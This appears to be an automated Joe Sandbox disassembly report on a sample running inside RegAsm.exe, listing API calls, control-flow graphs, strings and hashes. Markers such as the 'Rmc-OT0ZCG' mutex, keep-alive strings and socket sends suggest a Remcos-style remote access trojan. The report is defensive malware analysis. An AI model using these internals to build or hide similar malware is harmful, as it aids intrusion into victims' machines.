                            • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                            • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                            • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                            • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1406 40da6f-40da94 call 401f86 1409 40da9a 1406->1409 1410 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1406->1410 1412 40dae0-40dae7 call 41c048 1409->1412 1413 40daa1-40daa6 1409->1413 1414 40db93-40db98 1409->1414 1415 40dad6-40dadb 1409->1415 1416 40dba9 1409->1416 1417 40db9a-40db9f call 43c11f 1409->1417 1418 40daab-40dab9 call 41b645 call 401f13 1409->1418 1419 40dacc-40dad1 1409->1419 1420 40db8c-40db91 1409->1420 1432 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1412->1432 1433 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1412->1433 1422 40dbae-40dbb3 call 43c11f 1413->1422 1414->1422 1415->1422 1416->1422 1428 40dba4-40dba7 1417->1428 1437 40dabe 1418->1437 1419->1422 1420->1422 1434 40dbb4-40dbb9 call 409092 1422->1434 1428->1416 1428->1434 1442 40dac2-40dac7 call 401f09 1432->1442 1433->1437 1434->1410 1437->1442 1442->1410
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LongNamePath
                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                            • API String ID: 82841172-425784914
                            • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                            • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                            • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                            • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1488 44acc9-44ace2 1489 44ace4-44acf4 call 4467e6 1488->1489 1490 44acf8-44acfd 1488->1490 1489->1490 1497 44acf6 1489->1497 1492 44acff-44ad07 1490->1492 1493 44ad0a-44ad2e MultiByteToWideChar 1490->1493 1492->1493 1495 44ad34-44ad40 1493->1495 1496 44aec1-44aed4 call 43502b 1493->1496 1498 44ad94 1495->1498 1499 44ad42-44ad53 1495->1499 1497->1490 1501 44ad96-44ad98 1498->1501 1502 44ad55-44ad64 call 457210 1499->1502 1503 44ad72-44ad83 call 4461b8 1499->1503 1506 44aeb6 1501->1506 1507 44ad9e-44adb1 MultiByteToWideChar 1501->1507 1502->1506 1516 44ad6a-44ad70 1502->1516 1503->1506 1513 44ad89 1503->1513 1511 44aeb8-44aebf call 435ecd 1506->1511 1507->1506 1510 44adb7-44adc9 call 448c33 1507->1510 1518 44adce-44add2 1510->1518 1511->1496 1517 44ad8f-44ad92 1513->1517 1516->1517 1517->1501 1518->1506 1520 44add8-44addf 1518->1520 1521 44ade1-44ade6 1520->1521 1522 44ae19-44ae25 1520->1522 1521->1511 1525 44adec-44adee 1521->1525 1523 44ae27-44ae38 1522->1523 1524 44ae71 1522->1524 1526 44ae53-44ae64 call 4461b8 1523->1526 1527 44ae3a-44ae49 call 457210 1523->1527 1528 44ae73-44ae75 1524->1528 1525->1506 1529 44adf4-44ae0e call 448c33 1525->1529 1533 44aeaf-44aeb5 call 435ecd 1526->1533 1544 44ae66 1526->1544 1527->1533 1542 44ae4b-44ae51 1527->1542 1532 44ae77-44ae90 call 448c33 1528->1532 1528->1533 1529->1511 1541 44ae14 1529->1541 1532->1533 1545 44ae92-44ae99 1532->1545 1533->1506 1541->1506 1546 44ae6c-44ae6f 1542->1546 1544->1546 1547 44aed5-44aedb 1545->1547 1548 44ae9b-44ae9c 1545->1548 1546->1528 1549 44ae9d-44aead WideCharToMultiByte 1547->1549 1548->1549 1549->1533 1550 44aedd-44aee4 call 435ecd 1549->1550 1550->1511
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                            • __alloca_probe_16.LIBCMT ref: 0044AD5B
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                            • __alloca_probe_16.LIBCMT ref: 0044AE40
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                            • __freea.LIBCMT ref: 0044AEB0
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            • __freea.LIBCMT ref: 0044AEB9
                            • __freea.LIBCMT ref: 0044AEDE
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 3864826663-0
                            • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                            • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                            • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                            • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1634 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1645 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1634->1645 1646 41b3ee-41b3f7 1634->1646 1656 41b3e6-41b3e9 call 401fd8 1645->1656 1657 41b3da-41b3e3 call 41cffa 1645->1657 1647 41b400 1646->1647 1648 41b3f9-41b3fe 1646->1648 1650 41b405-41b410 call 40537d 1647->1650 1648->1650 1656->1646 1657->1656
                            APIs
                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                              • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                              • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                              • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                              • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                            • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseCurrentOpenQueryValueWow64
                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 782494840-2070987746
                            • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                            • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                            • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                            • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                            • __freea.LIBCMT ref: 10008A08
                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                            • __freea.LIBCMT ref: 10008A11
                            • __freea.LIBCMT ref: 10008A36
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountEventTick
                            • String ID: !D@$NG
                            • API String ID: 180926312-2721294649
                            • Opcode ID: 057d7f0dcf3640348c68adfe9d1ca76fd8cc1f974dc32ec21b4205a70dcdf678
                            • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                            • Opcode Fuzzy Hash: 057d7f0dcf3640348c68adfe9d1ca76fd8cc1f974dc32ec21b4205a70dcdf678
                            • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                            APIs
                              • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                              • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                              • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                              • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                              • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                              • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                              • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                            • _free.LIBCMT ref: 10006CD7
                            • _free.LIBCMT ref: 10006D0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorLast_abort
                            • String ID: xV$xV
                            • API String ID: 2991157371-3041289288
                            • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                            • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                            • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                            • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                            APIs
                            • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$EventLocalThreadTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 2532271599-1507639952
                            • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                            • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                            • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                            • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                            • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                            • RegCloseKey.KERNEL32(?), ref: 004137EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: pth_unenc
                            • API String ID: 1818849710-4028850238
                            • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                            • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                            • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                            • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                            • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                            • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                            • String ID:
                            • API String ID: 3360349984-0
                            • Opcode ID: d789810c3dbbbf6e259483921c055d4dbd3c5e70ff459b446317af5ddb3a36c3
                            • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                            • Opcode Fuzzy Hash: d789810c3dbbbf6e259483921c055d4dbd3c5e70ff459b446317af5ddb3a36c3
                            • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                            APIs
                            • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModuleProtectVirtual
                            • String ID:
                            • API String ID: 2905821283-0
                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                            • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                            • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                            • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                            • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                            • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                            • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                            • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                            • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                            • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                            • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                            • CloseHandle.KERNEL32(00000000), ref: 0041C576
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 3919263394-0
                            • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                            • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                            • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                            • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                            • GetLastError.KERNEL32 ref: 0040D0BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID: Rmc-OT0ZCG
                            • API String ID: 1925916568-2453204340
                            • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                            • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                            • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                            • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                            APIs
                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                              • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModuleProtectVirtual
                            • String ID:
                            • API String ID: 2905821283-0
                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                            • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                            • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                            APIs
                            • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                            • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventObjectSingleWaitsend
                            • String ID:
                            • API String ID: 3963590051-0
                            • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                            • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                            • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                            • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                            APIs
                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ProtectVirtual$HandleModule
                            • String ID:
                            • API String ID: 3519776433-0
                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                            • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
